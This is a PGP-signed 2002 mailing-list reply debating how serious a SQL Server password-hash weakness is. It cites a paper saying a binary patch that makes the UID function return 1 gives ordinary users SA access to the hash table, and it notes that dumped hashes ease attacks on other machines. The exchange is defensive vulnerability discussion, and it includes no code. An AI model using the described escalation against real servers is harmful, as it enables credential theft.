-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 01:59 AM 7/9/2002, Barry Dorrans wrote:

>The password cracker relies on getting access to the hashes that SQL
>users to store old style usernames and passwords. This are stored within
>a SQL database on the servers, and can be retrieved. However, they can
>ONLY be retrieved by users who already have SA rights. This is the
>information that theregister, and Mr Greene leaves out. The hashes are
>stored in sysxlogins, which is not available to your average joe user.

As described in a paper by Chris Anley,
http://www.nextgenss.com/papers/violating_database_security.pdf,
a regular user can employ a simple binary patch to client-side apps using
the ExectuionContext::UID function to explicitly return "UID 1" to table
selects, thus giving any user "SA" rights to the table. If the user can
log on, the user can get to any table.

I agree that mixed mode should not be used, and that NT integrated
authentication is the method of choice. I have not had the opportunity to
check if this works with NT integrated security, but since the "UID 1" is a
hard-coded value that SQL recognizes as SA for the table, I do not see why
it would not work.

The main focus of the paper (by NGSSoftware) that Greene based his article
on is to show the weakness of the hash-- I think that since any user *can*
get to the hashes, and since the hash values have been shown to be weak,
thus resulting in the retrieval of all user's passwords, the paper is
valuable.

Even if only true SA could get the hashes, it still allows an attacker much
more information than they should be able to get- it is similar to pwdump2-
you have to be admin on the box to use it, but once you get the data, you
find that compromising other machines downrange is much easier.

Cheers-

AD

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPSxiP4hsmyD15h5gEQL5ngCfWaVcB+P03YUpW1JKhqWxynXVOtIAoJYD
8kNe7ao0//P+YN9wiXR5vr/Y
=lZYC
-----END PGP SIGNATURE-----

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]